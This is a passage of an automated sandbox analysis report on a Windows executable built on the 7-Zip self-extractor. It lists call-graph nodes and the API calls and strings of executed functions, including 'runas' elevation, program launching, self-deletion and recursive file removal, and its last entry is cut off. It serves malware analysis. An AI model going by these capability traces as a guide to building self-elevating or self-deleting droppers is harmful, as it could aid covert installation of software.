4054a9 19721->19722 19723 41146b 22 API calls 19722->19723 19724 4054b6 19723->19724 19725 411b73 RaiseException 19724->19725 19726 4054c6 19725->19726 19727 41156d 22 API calls 19726->19727 19728 4054da 19727->19728 19729 411772 RaiseException 19728->19729 19730 4054e7 19729->19730 19731 41146b 22 API calls 19730->19731 19732 4054f4 19731->19732 20383 41b0a8 20365->20383 20367 41a967 20368 41aff9 __strnicoll 23 API calls 20367->20368 20375 41a973 20368->20375 20369 41a941 20371 41cfc3 __strnicoll 20 API calls 20369->20371 20370 41a92a 20370->20367 20370->20369 20381 41a951 20370->20381 20372 41a946 20371->20372 20374 41cf06 __strnicoll 26 API calls 20372->20374 20374->20381 20376 41a999 20375->20376 20390 41cffc 20375->20390 20379 41ac6c 20376->20379 20394 41b07c 20376->20394 20377 41b07c 26 API calls 20380 41af8f 20377->20380 20379->20377 20380->20381 20382 41cfc3 __strnicoll 20 API calls 20380->20382 20381->18259 20382->20381 20384 41b0c0 20383->20384 20385 41b0ad 20383->20385 20384->20370 20386 41cfc3 __strnicoll 20 API calls 20385->20386 20387 41b0b2 20386->20387 20388 41cf06 __strnicoll 26 API calls 20387->20388 20389 41b0bd 20388->20389 20389->20370 20391 41d019 20390->20391 20392 41d01d 20390->20392 20391->20375 20392->20391 20400 420e1e GetStringTypeW 20392->20400 20395 41b0a4 20394->20395 20396 41b08f 20394->20396 20395->20379 20396->20395 20397 41cfc3 __strnicoll 20 API calls 20396->20397 20398 41b099 20397->20398 20399 41cf06 __strnicoll 26 API calls 20398->20399 20399->20395 20400->20391 20402 4117c7 20401->20402 20402->20402 20403 4118be RaiseException 20402->20403 20404 4117d4 20403->20404 20404->18868 20406 409e31 20405->20406 20407 409e8f 20405->20407 20408 407c4c 24 API calls 20406->20408 20407->18898 20409 409e40 IsWindow 20408->20409 20410 409e69 20409->20410 20411 409e57 IsBadReadPtr 20409->20411 20412 409c48 24 API calls 20410->20412 20411->20410 20412->20407 20421 4101b2 20413->20421 20427 410333 20416->20427 20419 41041f GetLastError 20420 410723 20419->20420 20420->18941 20424 4101cb 20421->20424 20425 4100fb 2 API calls 20424->20425 20426 405f9e 20425->20426 20426->18931 20426->18949 20429 41034b 20427->20429 20430 410372 20429->20430 20431 41037f WriteFile 20429->20431 20430->20419 20431->20429 20433 411ca9 22 API calls 20432->20433 20434 41140b 20433->20434 20434->18956 20600 41bd70 20599->20600 20601 41bd5e 20599->20601 20611 41bc1e 20600->20611 20627 41bdf8 GetModuleHandleW 20601->20627 20612 41bc2a BuildCatchObjectHelperInternal 20611->20612 20637 41d7fe EnterCriticalSection 20612->20637 20614 41bc34 20638 41bc61 20614->20638 20628 41bd63 20627->20628 20628->20600 20629 41be3c GetModuleHandleExW 20628->20629 20630 41be66 GetProcAddress 20629->20630 20631 41be89 20629->20631 20632 41be7b 20630->20632 20633 41be98 20631->20633 20634 41be8f FreeLibrary 20631->20634 20632->20631 20635 41a167 CatchGuardHandler 5 API calls 20633->20635 20634->20633 20636 41bd6f 20635->20636 20636->20600 20637->20614 20642 41bc6d BuildCatchObjectHelperInternal 20638->20642 20639 41bd08 20651 4248e9 20639->20651 20642->20639 20643 41bcda 20642->20643 20654 41c821 20642->20654 20644 41bcf7 20643->20644 20646 41caaa FindHandlerForForeignException 5 API calls 20643->20646 20647 41caaa FindHandlerForForeignException 5 API calls 20644->20647 20646->20644 20647->20639 20652 41a167 CatchGuardHandler 5 API calls 20651->20652 20653 4248f4 20652->20653 20653->20653 20657 41c504 20654->20657 20656 41c84c 20656->20643 20658 41c510 BuildCatchObjectHelperInternal 20657->20658 20665 41d7fe EnterCriticalSection 20658->20665 20660 41c51e 20666 41c6e7 20660->20666 20664 41c53c __onexit 20664->20656 20665->20660 20667 41c707 20666->20667 20670 41c70f 20666->20670 20668 41a167 CatchGuardHandler 5 API calls 20667->20668 20669 41c52b 20668->20669 20672 41c549 20669->20672 20670->20667 20671 41d8ba _free 20 API calls 20670->20671 20671->20667 20675 41d846 LeaveCriticalSection 20672->20675 20674 41c553 20674->20664 20675->20674 20687 41c9eb 20686->20687 20688 41c9fd 20686->20688 20690 41c9f9 20687->20690 20693 420014 20687->20693 20696 41fd5b 20688->20696 20690->17592 20700 41fec6 20693->20700 20697 41fd74 20696->20697 20698 41a167 CatchGuardHandler 5 API calls 20697->20698 20699 41ca0c 20698->20699 20699->17592 20703 41fe24 20700->20703 20702 41ff05 20702->20690 20704 41fe30 BuildCatchObjectHelperInternal 20703->20704 20711 41d7fe EnterCriticalSection 20704->20711 20706 41fea6 20720 41feba 20706->20720 20707 41fe3a ___scrt_uninitialize_crt 20707->20706 20712 41fda3 20707->20712 20709 41feb2 __onexit 20709->20702 20711->20707 20713 41fdaf BuildCatchObjectHelperInternal 20712->20713 20723 41e8ea EnterCriticalSection 20713->20723 20715 41fdb9 ___scrt_uninitialize_crt 20716 41fdf1 20715->20716 20724 41ffcd 20715->20724 20734 41fe18 20716->20734 20718 41fe10 __onexit 20718->20707 20876 41d846 LeaveCriticalSection 20720->20876 20722 41fec4 20722->20709 20723->20715 20725 41ffe3 20724->20725 20726 41ffda 20724->20726 20737 41ff6a 20725->20737 20727 41fec6 ___scrt_uninitialize_crt 59 API calls 20726->20727 20729 41ffe0 20727->20729 20729->20716 20732 420003 20750 421b06 20732->20750 20875 41e8fe LeaveCriticalSection 20734->20875 20736 41fe22 20736->20718 20738 41ff81 20737->20738 20742 41ffa6 20737->20742 20739 41e7b0 ___scrt_uninitialize_crt 26 API calls 20738->20739 20738->20742 20740 41ff9f 20739->20740 20761 422126 20740->20761 20742->20729 20743 41e7b0 20742->20743 20744 41e7d1 20743->20744 20745 41e7bc 20743->20745 20744->20732 20746 41cfc3 __strnicoll 20 API calls 20745->20746 20747 41e7c1 20746->20747 20748 41cf06 __strnicoll 26 API calls 20747->20748 20749 41e7cc 20748->20749 20749->20732 20751 421b17 20750->20751 20752 421b24 20750->20752 20753 41cfc3 __strnicoll 20 API calls 20751->20753 20754 421b6d 20752->20754 20757 421b4b 20752->20757 20760 421b1c 20753->20760 20755 41cfc3 __strnicoll 20 API calls 20754->20755 20756 421b72 20755->20756 20759 41cf06 __strnicoll 26 API calls 20756->20759 20844 421a6e 20757->20844 20759->20760 20760->20729 20762 422132 BuildCatchObjectHelperInternal 20761->20762 20763 422152 20762->20763 20764 42213a 20762->20764 20766 4221ed 20763->20766 20770 422184 20763->20770 20786 41cfb0 20764->20786 20768 41cfb0 __dosmaperr 20 API calls 20766->20768 20771 4221f2 20768->20771 20769 41cfc3 __strnicoll 20 API calls 20779 422147 __onexit 20769->20779 20789 420160 EnterCriticalSection 20770->20789 20773 41cfc3 __strnicoll 20 API calls 20771->20773 20775 4221fa 20773->20775 20774 42218a 20776 4221a6 20774->20776 20777 4221bb 20774->20777 20778 41cf06 __strnicoll 26 API calls 20775->20778 20780 41cfc3 __strnicoll 20 API calls 20776->20780 20790 42220e 20777->20790 20778->20779 20779->20742 20782 4221ab 20780->20782 20784 41cfb0 __dosmaperr 20 API calls 20782->20784 20783 4221b6 20841 4221e5 20783->20841 20784->20783 20787 41d5a1 __strnicoll 20 API calls 20786->20787 20788 41cfb5 20787->20788 20788->20769 20789->20774 20791 42223b 20790->20791 20827 422234 20790->20827 20792 42225f 20791->20792 20793 42223f 20791->20793 20798 4222ae 20792->20798 20799 422291 20792->20799 20794 41cfb0 __dosmaperr 20 API calls 20793->20794 20797 422244 20794->20797 20795 41a167 CatchGuardHandler 5 API calls 20796 42241c 20795->20796 20796->20783 20802 41cfc3 __strnicoll 20 API calls 20797->20802 20801 4222c1 20798->20801 20804 42280b ___scrt_uninitialize_crt 28 API calls 20798->20804 20800 41cfb0 __dosmaperr 20 API calls 20799->20800 20803 422296 20800->20803 20806 421db6 ___scrt_uninitialize_crt 30 API calls 20801->20806 20805 42224c 20802->20805 20807 41cfc3 __strnicoll 20 API calls 20803->20807 20804->20801 20808 41cf06 __strnicoll 26 API calls 20805->20808 20809 4222d2 20806->20809 20810 42229e 20807->20810 20808->20827 20811 422316 20809->20811 20812 4222d7 20809->20812 20813 41cf06 __strnicoll 26 API calls 20810->20813 20814 42232a 20811->20814 20815 42236f WriteFile 20811->20815 20816 422300 20812->20816 20817 4222db 20812->20817 20813->20827 20820 422335 20814->20820 20821 42235f 20814->20821 20818 422393 GetLastError 20815->20818 20826 4222f6 20815->20826 20819 421b85 ___scrt_uninitialize_crt 29 API calls 20816->20819 20822 421d49 ___scrt_uninitialize_crt 6 API calls 20817->20822 20817->20826 20818->20826 20819->20826 20824 42233a 20820->20824 20825 42234f 20820->20825 20823 421e2c ___scrt_uninitialize_crt 7 API calls 20821->20823 20822->20826 20823->20826 20824->20826 20831 421f0b ___scrt_uninitialize_crt 7 API calls 20824->20831 20828 421ff9 ___scrt_uninitialize_crt 8 API calls 20825->20828 20826->20827 20829 4223b9 20826->20829 20830 4223dd 20826->20830 20827->20795 20828->20826 20832 4223c0 20829->20832 20833 4223d4 20829->20833 20830->20827 20835 41cfc3 __strnicoll 20 API calls 20830->20835 20831->20826 20836 41cfc3 __strnicoll 20 API calls 20832->20836 20834 41cf8d __dosmaperr 20 API calls 20833->20834 20834->20827 20837 4223f9 20835->20837 20838 4223c5 20836->20838 20839 41cfb0 __dosmaperr 20 API calls 20837->20839 20840 41cfb0 __dosmaperr 20 API calls 20838->20840 20839->20827 20840->20827 20842 420183 ___scrt_uninitialize_crt LeaveCriticalSection 20841->20842 20843 4221eb 20842->20843 20843->20779 20845 421a7a BuildCatchObjectHelperInternal 20844->20845 20858 420160 EnterCriticalSection 20845->20858 20847 421a89 20848 421ad0 20847->20848 20859 420237 20847->20859 20850 41cfc3 __strnicoll 20 API calls 20848->20850 20851 421ad5 20850->20851 20872 421afa 20851->20872 20852 421ab5 FlushFileBuffers 20852->20851 20853 421ac1 20852->20853 20855 41cfb0 __dosmaperr 20 API calls 20853->20855 20857 421ac6 GetLastError 20855->20857 20856 421aed __onexit 20856->20760 20857->20848 20858->20847 20860 420244 20859->20860 20861 420259 20859->20861 20862 41cfb0 __dosmaperr 20 API calls 20860->20862 20863 41cfb0 __dosmaperr 20 API calls 20861->20863 20866 42027e 20861->20866 20864 420249 20862->20864 20867 420289 20863->20867 20865 41cfc3 __strnicoll 20 API calls 20864->20865 20868 420251 20865->20868 20866->20852 20869 41cfc3 __strnicoll 20 API calls 20867->20869 20868->20852 20870 420291 20869->20870 20871 41cf06 __strnicoll 26 API calls 20870->20871 20871->20868 20873 420183 ___scrt_uninitialize_crt LeaveCriticalSection 20872->20873 20874 421b04 20873->20874 20874->20856 20875->20736 20876->20722 20996 418c47 20999 41932c 20996->20999 21001 41933c 20999->21001 21005 419351 20999->21005 21000 417f34 FindHandlerForForeignException 48 API calls 21002 41935f 21000->21002 21003 418c4f 21001->21003 21001->21005 21007 417f34 21001->21007 21002->21003 21006 417f34 FindHandlerForForeignException 48 API calls 21002->21006 21005->21000 21006->21003 21021 417f42 21007->21021 21009 417f39 21010 417f41 21009->21010 21035 41e127 21009->21035 21010->21005 21013 41b9e0 IsProcessorFeaturePresent 21015 41b9ec 21013->21015 21018 41cd41 FindHandlerForForeignException 8 API calls 21015->21018 21016 41bed3 FindHandlerForForeignException 29 API calls 21019 41ba09 21016->21019 21017 41b9d6 21017->21013 21020 41b9ff 21017->21020 21018->21020 21020->21016 21022 417f4b 21021->21022 21023 417f4e GetLastError 21021->21023 21022->21009 21065 4190d1 21023->21065 21026 417fc8 SetLastError 21026->21009 21027 41910c ___vcrt_FlsSetValue 6 API calls 21028 417f7c FindHandlerForForeignException 21027->21028 21029 417fa4 21028->21029 21030 41910c ___vcrt_FlsSetValue 6 API calls 21028->21030 21034 417f82 21028->21034 21031 41910c ___vcrt_FlsSetValue 6 API calls 21029->21031 21032 417fb8 21029->21032 21030->21029 21031->21032 21070 41b8fd 21032->21070 21034->21026 21073 41e063 21035->21073 21037 41b9cb 21037->21017 21038 41e177 21037->21038 21039 41e183 BuildCatchObjectHelperInternal 21038->21039 21040 41d5a1 __strnicoll 20 API calls 21039->21040 21043 41e1b0 FindHandlerForForeignException 21039->21043 21046 41e1aa FindHandlerForForeignException 21039->21046 21040->21046 21041 41e1f5 21042 41cfc3 __strnicoll 20 API calls 21041->21042 21044 41e1fa 21042->21044 21050 41e221 21043->21050 21084 41d7fe EnterCriticalSection 21043->21084 21047 41cf06 __strnicoll 26 API calls 21044->21047 21045 4248e9 FindHandlerForForeignException 5 API calls 21049 41e36c 21045->21049 21046->21041 21046->21043 21064 41e1df 21046->21064 21047->21064 21049->21017 21051 41e27b 21050->21051 21053 41e273 21050->21053 21061 41e2a6 21050->21061 21085 41d846 LeaveCriticalSection 21050->21085 21051->21061 21086 41e16e 21051->21086 21056 41bed3 FindHandlerForForeignException 29 API calls 21053->21056 21056->21051 21058 41d453 pre_c_initialization 23 API calls 21062 41e309 21058->21062 21060 41e16e FindHandlerForForeignException 23 API calls 21060->21061 21089 41e325 21061->21089 21063 41d453 pre_c_initialization 23 API calls 21062->21063 21062->21064 21063->21064 21064->21045 21066 418fec try_get_function 5 API calls 21065->21066 21067 4190eb 21066->21067 21068 419103 TlsGetValue 21067->21068 21069 417f63 21067->21069 21068->21069 21069->21026 21069->21027 21069->21034 21071 41d8ba _free 20 API calls 21070->21071 21072 41b915 21071->21072 21072->21034 21074 41e06f BuildCatchObjectHelperInternal 21073->21074 21079 41d7fe EnterCriticalSection 21074->21079 21076 41e07d 21080 41e0b1 21076->21080 21078 41e0a4 __onexit 21078->21037 21079->21076 21083 41d846 LeaveCriticalSection 21080->21083 21082 41e0bb 21082->21078 21083->21082 21084->21050 21085->21053 21087 41d453 pre_c_initialization 23 API calls 21086->21087 21088 41e173 21087->21088 21088->21060 21090 41e2fa 21089->21090 21091 41e32b 21089->21091 21090->21058 21090->21062 21090->21064 21093 41d846 LeaveCriticalSection 21091->21093 21093->21090 23455 41d318 23456 41d323 23455->23456 23460 41d333 23455->23460 23461 41d339 23456->23461 23459 41d8ba _free 20 API calls 23459->23460 23462 41d34e 23461->23462 23465 41d354 23461->23465 23463 41d8ba _free 20 API calls 23462->23463 23463->23465 23464 41d8ba _free 20 API calls 23466 41d360 23464->23466 23465->23464 23467 41d8ba _free 20 API calls 23466->23467 23468 41d36b 23467->23468 23469 41d8ba _free 20 API calls 23468->23469 23470 41d376 23469->23470 23471 41d8ba _free 20 API calls 23470->23471 23472 41d381 23471->23472 23473 41d8ba _free 20 API calls 23472->23473 23474 41d38c 23473->23474 23475 41d8ba _free 20 API calls 23474->23475 23476 41d397 23475->23476 23477 41d8ba _free 20 API calls 23476->23477 23478 41d3a2 23477->23478 23479 41d8ba _free 20 API calls 23478->23479 23480 41d3ad 23479->23480 23481 41d8ba _free 20 API calls 23480->23481 23482 41d3bb 23481->23482 23487 41d181 23482->23487 23484 41d3e1 23495 41d1e2 23484->23495 23486 41d32b 23486->23459 23488 41d18d BuildCatchObjectHelperInternal 23487->23488 23503 41d7fe EnterCriticalSection 23488->23503 23491 41d197 23492 41d8ba _free 20 API calls 23491->23492 23494 41d1c1 23491->23494 23492->23494 23493 41d1ce __onexit 23493->23484 23504 41d1d6 23494->23504 23496 41d1ee BuildCatchObjectHelperInternal 23495->23496 23508 41d7fe EnterCriticalSection 23496->23508 23498 41d1f8 23499 41d408 __strnicoll 20 API calls 23498->23499 23500 41d20b 23499->23500 23509 41d221 23500->23509 23502 41d219 __onexit 23502->23486 23503->23491 23507 41d846 LeaveCriticalSection 23504->23507 23506 41d1e0 23506->23493 23507->23506 23508->23498 23512 41d846 LeaveCriticalSection 23509->23512 23511 41d22b 23511->23502 23512->23511 21594 41cc1c 21597 41cbad 21594->21597 21596 41cc41 21598 41cbb9 BuildCatchObjectHelperInternal 21597->21598 21605 41d7fe EnterCriticalSection 21598->21605 21600 41cbc3 21601 41cbf1 21600->21601 21604 420989 __strnicoll 20 API calls 21600->21604 21606 41cc05 21601->21606 21603 41cbfd __onexit 21603->21596 21604->21600 21605->21600 21609 41d846 LeaveCriticalSection 21606->21609 21608 41cc0f 21608->21603 21609->21608 22574 41093e 22575 41094f 22574->22575 22576 41245e 2 API calls 22575->22576 22577 410aa6 22575->22577 22579 4124d1 22575->22579 22576->22575 22580 4124de 22579->22580 22581 41250d 22579->22581 22580->22581 22583 40b7d8 2 API calls 22580->22583 22584 40c057 22580->22584 22581->22575 22583->22580 22586 40c066 22584->22586 22585 40c10d 22585->22580 22586->22585 22587 40bf05 95 API calls 22586->22587 22588 40b7d8 2 API calls 22586->22588 22589 40bff4 97 API calls 22586->22589 22590 4106ea 2 API calls 22586->22590 22587->22586 22588->22586 22589->22586 22590->22586 21673 41fccf 21674 41fcf5 21673->21674 21677 41fcf1 21673->21677 21674->21677 21678 41e9ca 2 API calls 21674->21678 21679 41ea7e 31 API calls 21674->21679 21675 41a167 CatchGuardHandler 5 API calls 21676 41fd57 21675->21676 21677->21675 21678->21674 21679->21674 23202 408680 23203 408692 23202->23203 23204 408699 23202->23204 23213 407d01 23203->23213 23205 4086a2 GetDlgItem 23204->23205 23206 408697 23204->23206 23208 4047fa 24 API calls 23205->23208 23209 408640 EndDialog 23206->23209 23210 4086ba 23208->23210 23211 4086dd 23209->23211 23212 41156d 22 API calls 23210->23212 23212->23206 23223 416960 23213->23223 23216 407d3b SHGetPathFromIDListW 23217 407d56 23216->23217 23218 407d6e SHGetMalloc 23216->23218 23219 4115d4 22 API calls 23217->23219 23221 407d80 23218->23221 23220 407d67 23219->23220 23222 4097eb 33 API calls 23220->23222 23221->23206 23222->23218 23224 407d1b SHBrowseForFolderW 23223->23224 23224->23216 23224->23221 21941 41e89e 21942 420014 ___scrt_uninitialize_crt 59 API calls 21941->21942 21943 41e8a6 21942->21943 21951 4211de 21943->21951 21945 41e8ab 21961 42127e 21945->21961 21948 41e8d5 21949 41d8ba _free 20 API calls 21948->21949 21950 41e8e0 21949->21950 21952 4211ea BuildCatchObjectHelperInternal 21951->21952 21965 41d7fe EnterCriticalSection 21952->21965 21954 421260 21979 421275 21954->21979 21956 4211f5 21956->21954 21958 421234 DeleteCriticalSection 21956->21958 21966 42289c 21956->21966 21957 42126c __onexit 21957->21945 21959 41d8ba _free 20 API calls 21958->21959 21959->21956 21962 421294 21961->21962 21963 41e8ba DeleteCriticalSection 21961->21963 21962->21963 21964 41d8ba _free 20 API calls 21962->21964 21963->21945 21963->21948 21964->21963 21965->21956 21967 4228a8 BuildCatchObjectHelperInternal 21966->21967 21968 4228b2 21967->21968 21969 4228c7 21967->21969 21971 41cfc3 __strnicoll 20 API calls 21968->21971 21970 4228c2 __onexit 21969->21970 21982 41e8ea EnterCriticalSection 21969->21982 21970->21956 21973 4228b7 21971->21973 21975 41cf06 __strnicoll 26 API calls 21973->21975 21974 4228e3 21983 422826 21974->21983 21975->21970 21977 4228ee 21999 42290b 21977->21999 22063 41d846 LeaveCriticalSection 21979->22063 21981 42127c 21981->21957 21982->21974 21984 422833 21983->21984 21985 422848 21983->21985 21986 41cfc3 __strnicoll 20 API calls 21984->21986 21987 41ff6a ___scrt_uninitialize_crt 55 API calls 21985->21987 21989 422843 21985->21989 21988 422838 21986->21988 21990 42285c 21987->21990 21991 41cf06 __strnicoll 26 API calls 21988->21991 21989->21977 21992 42127e 20 API calls 21990->21992 21991->21989 21993 422864 21992->21993 21994 41e7b0 ___scrt_uninitialize_crt 26 API calls 21993->21994 21995 42286a 21994->21995 22002 423906 21995->22002 21998 41d8ba _free 20 API calls 21998->21989 22062 41e8fe LeaveCriticalSection 21999->22062 22001 422913 22001->21970 22003 423917 22002->22003 22004 42392c 22002->22004 22005 41cfb0 __dosmaperr 20 API calls 22003->22005 22006 423975 22004->22006 22009 423953 22004->22009 22008 42391c 22005->22008 22007 41cfb0 __dosmaperr 20 API calls 22006->22007 22010 42397a 22007->22010 22011 41cfc3 __strnicoll 20 API calls 22008->22011 22017 423884 22009->22017 22013 41cfc3 __strnicoll 20 API calls 22010->22013 22014 422870 22011->22014 22015 423982 22013->22015 22014->21989 22014->21998 22016 41cf06 __strnicoll 26 API calls 22015->22016 22016->22014 22018 423890 BuildCatchObjectHelperInternal 22017->22018 22028 420160 EnterCriticalSection 22018->22028 22020 42389e 22021 4238d0 22020->22021 22022 4238c5 22020->22022 22023 41cfc3 __strnicoll 20 API calls 22021->22023 22029 423995 22022->22029 22025 4238cb 22023->22025 22044 4238fa 22025->22044 22027 4238ed __onexit 22027->22014 22028->22020 22030 420237 ___scrt_uninitialize_crt 26 API calls 22029->22030 22032 4239a5 22030->22032 22031 4239ab 22047 4201a6 22031->22047 22032->22031 22034 4239dd 22032->22034 22037 420237 ___scrt_uninitialize_crt 26 API calls 22032->22037 22034->22031 22035 420237 ___scrt_uninitialize_crt 26 API calls 22034->22035 22038 4239e9 CloseHandle 22035->22038 22040 4239d4 22037->22040 22038->22031 22041 4239f5 GetLastError 22038->22041 22039 423a25 22039->22025 22043 420237 ___scrt_uninitialize_crt 26 API calls 22040->22043 22041->22031 22043->22034 22061 420183 LeaveCriticalSection 22044->22061 22046 423904 22046->22027 22048 4201b5 22047->22048 22049 42021c 22047->22049 22048->22049 22055 4201df 22048->22055 22050 41cfc3 __strnicoll 20 API calls 22049->22050 22051 420221 22050->22051 22052 41cfb0 __dosmaperr 20 API calls 22051->22052 22053 42020c 22052->22053 22053->22039 22056 41cf8d 22053->22056 22054 420206 SetStdHandle 22054->22053 22055->22053 22055->22054 22057 41cfb0 __dosmaperr 20 API calls 22056->22057 22058 41cf98 _free 22057->22058 22059 41cfc3 __strnicoll 20 API calls 22058->22059 22060 41cfab 22059->22060 22060->22039 22061->22046 22062->22001 22063->21981

                                                            Executed Functions

                                                            Function 004066CF Relevance: 85.2, APIs: 15, Strings: 33, Instructions: 1175COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 004066E6
                                                            • GetVersionExW.KERNEL32(?), ref: 00406711
                                                            • GetCommandLineW.KERNEL32(?), ref: 00406771
                                                            • GetCommandLineW.KERNEL32(00000001,?,?,?,?,00000000), ref: 004067BB
                                                            • wsprintfW.USER32 ref: 004067E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CommandLine$CountTickVersionwsprintf
                                                            • String ID: " -$7-Zip SFX$7ZipSfx.%03x$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteOnLoad$FinishMessage$HelpText$InstallPath$P,l$PreExtract$RunProgram$SelfDelete$SetEnvironment$SfxString%d$SfxVarApiPath$SfxVarCmdLine0$SfxVarModulePlatform$SfxVarSystemLanguage$SfxVarSystemPlatform$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$\}B$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxversion$sfxwaitall$x86
                                                            • API String ID: 1723450458-706316593
                                                            • Opcode ID: 6ea2fd087c463c26246448f36aff3ab3ad4a3c27bf8f3659cded3ca7ea88b691
                                                            • Instruction ID: fe591844941010429f44e859f80dec6b089a6e9baa65e336561e13b5bdf55dd3
                                                            • Opcode Fuzzy Hash: 6ea2fd087c463c26246448f36aff3ab3ad4a3c27bf8f3659cded3ca7ea88b691
                                                            • Instruction Fuzzy Hash: CB8206B1E04215AADB24BB75EC52BAE3764EB14318F10443FF502B62E2DBBD5D808B5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403C8F Relevance: 15.1, APIs: 10, Instructions: 85filestringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,00426BA8,00403E01,?,00000001), ref: 00403CBC
                                                            • lstrcmpW.KERNEL32(?,00426BB0,?,00403E01), ref: 00403D08
                                                            • lstrcmpW.KERNEL32(?,00426BB4), ref: 00403D1E
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,?,00403E01), ref: 00403D37
                                                            • DeleteFileW.KERNELBASE(?), ref: 00403D44
                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00403D56
                                                            • FindClose.KERNEL32(00000000), ref: 00403D65
                                                            • SetCurrentDirectoryW.KERNEL32 ref: 00403D71
                                                            • SetFileAttributesW.KERNEL32(00403E01,00000000), ref: 00403D7B
                                                            • RemoveDirectoryW.KERNEL32(00403E01), ref: 00403D88
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: File$Find$AttributesDirectorylstrcmp$CloseCurrentDeleteFirstNextRemove
                                                            • String ID:
                                                            • API String ID: 3205300333-0
                                                            • Opcode ID: cc43d731c03cbb4038f616f827be555181c05136033f9e1f812c42bd5cc35ed5
                                                            • Instruction ID: 0b965938d7fd1dc5844f4fe6cafd2926f3eaf912dd344a29116ecc7a19cf7c79
                                                            • Opcode Fuzzy Hash: cc43d731c03cbb4038f616f827be555181c05136033f9e1f812c42bd5cc35ed5
                                                            • Instruction Fuzzy Hash: 1B314F31A00118ABDB21AFA1EC48A9E7F7DAF00746F54417AF515E11A0EB388B45DA58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004025A9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 83synchronizationCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 728 4025a9-4025f4 call 4114a2 * 2 call 416960 735 402601-402616 728->735 736 4025f6-4025fe 728->736 737 402621-402655 ShowWindow BringWindowToTop call 404cf6 call 4115d4 735->737 738 402618-40261e 735->738 736->735 743 402657-40266f ShellExecuteExW 737->743 744 402689-40268b 737->744 738->737 745 402671-402673 743->745 746 40268c-4026a3 call 419939 * 2 743->746 744->746 747 402680-402683 CloseHandle 745->747 748 402675-40267a WaitForSingleObject 745->748 747->744 748->747
                                                            APIs
                                                            • ShowWindow.USER32(00070288,00000005,?,?,00000001), ref: 0040262C
                                                            • BringWindowToTop.USER32(?), ref: 00402635
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00402667
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000001), ref: 0040267A
                                                            • CloseHandle.KERNEL32(?,?,?,00000001), ref: 00402683
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Window$BringCloseExecuteHandleObjectShellShowSingleWait
                                                            • String ID: <$runas
                                                            • API String ID: 2226624165-1187129395
                                                            • Opcode ID: edc08d954fae6c459c32326b43981e144c5db21d51f3ba96da4c28121a17c145
                                                            • Instruction ID: f6e7de8925abb06dade5db46c2281abbeba45517fdc6b0f2f8240acae50ee933
                                                            • Opcode Fuzzy Hash: edc08d954fae6c459c32326b43981e144c5db21d51f3ba96da4c28121a17c145
                                                            • Instruction Fuzzy Hash: B9315CB1E00219EFDF149FD5EC45AEEBBB4EF04310F10413AEA05A6290DB795941CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404399 Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 966 404399-4043b5 FindFirstFileW 967 4043b7-4043ba 966->967 968 4043bb-4043c9 FindClose 966->968 969 4043d8-4043df 968->969 970 4043cb-4043d7 SetLastError 968->970 971 4043e1-4043eb call 403e46 969->971 972 4043ec-4043ef 969->972 974 4043f1-404403 CompareFileTime 972->974 975 404405-404409 972->975 974->971 974->975
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 004043AC
                                                            • FindClose.KERNEL32(00000000), ref: 004043BC
                                                            • SetLastError.KERNEL32(00000010), ref: 004043CD
                                                            Memory Dump Source
